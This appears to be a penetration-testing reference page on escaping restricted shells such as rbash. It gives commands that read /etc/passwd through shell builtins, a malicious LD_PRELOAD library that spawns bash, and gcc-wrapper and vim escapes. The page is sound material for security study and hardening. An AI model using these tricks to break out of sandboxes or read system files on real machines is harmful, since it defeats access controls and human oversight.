Restricted Shells
A restricted shell such as rbash is a shell that restrict the action of the user to a limited list of commands/arguments. For instance, for rbash:
- we cannot use commands with pathnames containing a "/"
- we can use
helpto list available commands - we cannot use
cd - more restrictions may be in place
To escape of restricted shells, we can try to use command substitution (ex: ls `pwd`), command chaining, or editing environment variables.
Common tricks:
-
List files:
echo /*andecho /.* -
Read a file:
read f < /etc/passwd; echo $f -
Read a file:
f=$(</etc/passwd); echo $f
Use compgen -c, help, or <tab> to list available commands.
π Sometimes, ssh [...] -t "/bin/bash --noprofile" may work.
Restricted Bash (rbash)
Enumeration
The readonly command is useful to list which variable you can't edit.
$ readonly
ENV
PATH
HOME
You can use declare to get information about your environment.
$ declare -x # remove -x to see functions
BASH_VERSINFO=([0]="4" [1]="4" [2]="20" [3]="1" [4]="release" [5]="i686-pc-linux-gnu")
BASH_VERSION='4.4.20(1)-release'
PATH=/tmp/void/
SHELLOPTS=braceexpand:emacs:hashall:histexpand:history:interactive-comments:monitor
Read a file
Method using mapfile:
$ mapfile array < /etc/passwd
$ echo ${array[@]}
Method using history:
$ export HISTFILE=/etc/passwd
$ history -r
$ history
Method using bind:
$ bind -f /etc/passwd
Special Scenarios
LD_PRELOAD
If we have access to a program that honor LD_PRELOAD, e.g. any command aside from the builtin functions, we may be able to pop a bash. For that to be possible, we need a malicious .so.
If gcc is available, we can easily compile one, while it's unlikely.
$ echo 'void _init() {' > /tmp/test.c
$ echo 'system("/bin/bash");' >> /tmp/test.c
$ echo '}' >> /tmp/test.c
$ gcc -shared -fPIC /tmp/test.c -o /tmp/test.so -nostartfiles
$ LD_PRELOAD='/tmp/test.so' gcc
β‘οΈ If gcc is available, gcc -wrapper /bin/bash,-s . is faster.
VIM
If you can run VIM, it's easy to escape:
:set shell=/bin/bash
:shell